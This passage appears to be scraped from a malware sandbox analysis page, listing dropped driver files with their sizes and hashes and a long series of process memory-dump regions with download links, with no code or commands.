c4970ccaef393ef09516d1cc8e980058691586a4e57cde0b04b4297214c48b948e0264023b8cbb0c615c967a4c78291effab9f690336ea8eac5babe67cd79fac

Download Submit
C:\Windows\System32\drivers\b30be13d.sys

Filesize
368KB

MD5
990442d764ff1262c0b7be1e3088b6d3

SHA1
0b161374074ef2acc101ed23204da00a0acaa86e

SHA256
6c7ccd465090354438b39da8430a5c47e7f24768a5b12ee02fecf8763e77c9e4

SHA512
af3c6dfe32266a9d546f13559dcba7c075d074bdfdaf0e6bf2a8cae787008afa579f0d5f90e0c657dd614bb244a6d95ff8366c14b388e1f4a3ab76cccb23add4

Download Submit
C:\Windows\System32\drivers\klupd_b30be13da_klark.sys

Filesize
355KB

MD5
9cfe1ced0752035a26677843c0cbb4e3

SHA1
e8833ac499b41beb6763a684ba60333cdf955918

SHA256
3bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634

SHA512
29e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c

Download Submit
C:\Windows\System32\drivers\klupd_b30be13da_klbg.sys

Filesize
199KB

MD5
424b93cb92e15e3f41e3dd01a6a8e9cc

SHA1
2897ab04f69a92218bfac78f085456f98a18bdd3

SHA256
ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e

SHA512
15e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f

Download Submit
C:\Windows\System32\drivers\klupd_b30be13da_mark.sys

Filesize
260KB

MD5
66522d67917b7994ddfb5647f1c3472e

SHA1
f341b9b28ca7ac21740d4a7d20e4477dba451139

SHA256
5da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1

SHA512
921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968

Download Submit
memory/408-719-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/408-720-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2180-1318-0x000001931DC00000-0x000001931DC22000-memory.dmp

Filesize
136KB

Download
memory/2260-135-0x0000000000200000-0x00000000006C2000-memory.dmp

Filesize
4.8MB

Download
memory/2260-136-0x0000000000200000-0x00000000006C2000-memory.dmp

Filesize
4.8MB

Download
memory/2368-128-0x0000000000560000-0x0000000000A18000-memory.dmp

Filesize
4.7MB

Download
memory/2368-130-0x0000000000560000-0x0000000000A18000-memory.dmp

Filesize
4.7MB

Download
memory/2484-184-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/2484-259-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/2484-180-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/2484-182-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/2932-15-0x0000000000C80000-0x0000000001142000-memory.dmp

Filesize
4.8MB

Download
memory/2932-28-0x0000000000C80000-0x0000000001142000-memory.dmp

Filesize
4.8MB

Download
memory/2984-616-0x0000000005430000-0x00000000055F2000-memory.dmp

Filesize
1.8MB

Download
memory/2984-618-0x0000000007000000-0x0000000007092000-memory.dmp

Filesize
584KB

Download
memory/2984-617-0x00000000063F0000-0x000000000691C000-memory.dmp

Filesize
5.2MB

Download
memory/2984-615-0x0000000005240000-0x0000000005252000-memory.dmp

Filesize
72KB

Download
memory/2984-614-0x0000000000A60000-0x0000000000A9C000-memory.dmp

Filesize
240KB

Download
memory/3284-698-0x0000000000F20000-0x0000000000F80000-memory.dmp

Filesize
384KB

Download
memory/3284-697-0x0000000000E00000-0x0000000000E01000-memory.dmp

Filesize
4KB

Download
memory/3432-114-0x00000000002A0000-0x0000000000755000-memory.dmp

Filesize
4.7MB

Download
memory/3432-133-0x00000000002A0000-0x0000000000755000-memory.dmp

Filesize
4.7MB

Download
memory/3624-193-0x0000000000400000-0x0000000000CD2000-memory.dmp

Filesize
8.8MB

Download
memory/3624-178-0x0000000000400000-0x0000000000CD2000-memory.dmp

Filesize
8.8MB

Download
memory/4356-74-0x0000000000E80000-0x0000000000E83000-memory.dmp

Filesize
12KB

Download
memory/4356-72-0x0000000000E20000-0x0000000000E69000-memory.dmp

Filesize
292KB

Download
memory/4356-76-0x0000000001340000-0x00000000013A9000-memory.dmp

Filesize
420KB

Download
memory/4440-208-0x0000000000E50000-0x0000000000E53000-memory.dmp

Filesize
12KB

Download
memory/4440-210-0x0000000000ED0000-0x0000000000F39000-memory.dmp

Filesize
420KB

Download
memory/4844-1378-0x0000000000200000-0x00000000006C2000-memory.dmp

Filesize
4.8MB

Download
memory/4844-1385-0x0000000000200000-0x00000000006C2000-memory.dmp

Filesize
4.8MB

Download
memory/4860-34-0x00000000007F0000-0x0000000000AEB000-memory.dmp

Filesize
3.0MB

Download
memory/4860-33-0x00000000007F0000-0x0000000000AEB000-memory.dmp

Filesize
3.0MB

Download
memory/4912-35-0x0000000000200000-0x00000000006C2000-memory.dmp

Filesize
4.8MB

Download
memory/4912-53-0x0000000000200000-0x00000000006C2000-memory.dmp

Filesize
4.8MB

Download
memory/4912-205-0x0000000000200000-0x00000000006C2000-memory.dmp

Filesize
4.8MB

Download
memory/4912-676-0x0000000000200000-0x00000000006C2000-memory.dmp

Filesize
4.8MB

Download
memory/4912-160-0x0000000000200000-0x00000000006C2000-memory.dmp

Filesize
4.8MB

Download
memory/4912-461-0x0000000000200000-0x00000000006C2000-memory.dmp

Filesize
4.8MB

Download
memory/4912-131-0x0000000000200000-0x00000000006C2000-memory.dmp

Filesize
4.8MB

Download
memory/4912-29-0x0000000000200000-0x00000000006C2000-memory.dmp

Filesize
4.8MB

Download
memory/4912-725-0x0000000000200000-0x00000000006C2000-memory.dmp

Filesize
4.8MB

Download
memory/5108-156-0x0000000000400000-0x00000000009F2000-memory.dmp

Filesize
5.9MB

Download
memory/5196-39599-0x00000000009C0000-0x0000000000E60000-memory.dmp

Filesize
4.6MB

Download
memory/5196-39597-0x00000000009C0000-0x0000000000E60000-memory.dmp

Filesize
4.6MB

Download
memory/5212-81-0x0000000005A90000-0x0000000005AB2000-memory.dmp

Filesize
136KB

Download
memory/5212-98-0x0000000008290000-0x000000000890A000-memory.dmp

Filesize
6.5MB

Download
memory/5212-118-0x0000000008EC0000-0x0000000009464000-memory.dmp

Filesize
5.6MB

Download
memory/5212-117-0x0000000007D90000-0x0000000007DB2000-memory.dmp

Filesize
136KB

Download
memory/5212-116-0x0000000007DF0000-0x0000000007E86000-memory.dmp

Filesize
600KB

Download
memory/5212-99-0x0000000006E80000-0x0000000006E9A000-memory.dmp

Filesize
104KB

Download
memory/5212-83-0x0000000005D10000-0x0000000005D76000-memory.dmp

Filesize
408KB

Download
memory/5212-93-0x0000000006450000-0x00000000067A4000-memory.dmp

Filesize
3.3MB

Download
memory/5212-94-0x0000000006970000-0x000000000698E000-memory.dmp

Filesize
120KB

Download
memory/5212-82-0x0000000005C30000-0x0000000005C96000-memory.dmp

Filesize
408KB

Download
memory/5212-95-0x00000000069A0000-0x00000000069EC000-memory.dmp

Filesize
304KB

Download
memory/5212-80-0x0000000005E20000-0x0000000006448000-memory.dmp

Filesize
6.2MB

Download
memory/5212-79-0x0000000003010000-0x0000000003046000-memory.dmp

Filesize
216KB

Download
memory/5364-227-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/5364-226-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/5532-1159-0x0000000004480000-0x00000000044E6000-memory.dmp

Filesize
408KB

Download
memory/5532-1160-0x0000000004480000-0x00000000044E6000-memory.dmp

Filesize
408KB

Download
memory/5532-1162-0x0000000004480000-0x00000000044E6000-memory.dmp

Filesize
408KB

Download
memory/5532-1161-0x0000000004480000-0x00000000044E6000-memory.dmp

Filesize
408KB

Download
memory/5788-153-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/5788-157-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/5788-159-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/5788-204-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/5788-258-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/5788-233-0x0000000010000000-0x000000001001C000-memory.dmp

Filesize
112KB

Download
memory/8568-39801-0x0000000000F80000-0x0000000001D69000-memory.dmp

Filesize
13.9MB

Download
memory/11388-39995-0x00000000006A0000-0x0000000000DAE000-memory.dmp

Filesize
7.1MB

Download
memory/11388-40002-0x00000000006A0000-0x0000000000DAE000-memory.dmp

Filesize
7.1MB

Download
memory/12924-40031-0x0000000000200000-0x00000000006C2000-memory.dmp

Filesize
4.8MB

Download
memory/13240-39584-0x0000000000400000-0x00000000008CA000-memory.dmp

Filesize
4.8MB

Download
memory/13240-39572-0x0000000000400000-0x00000000008CA000-memory.dmp

Filesize
4.8MB

Download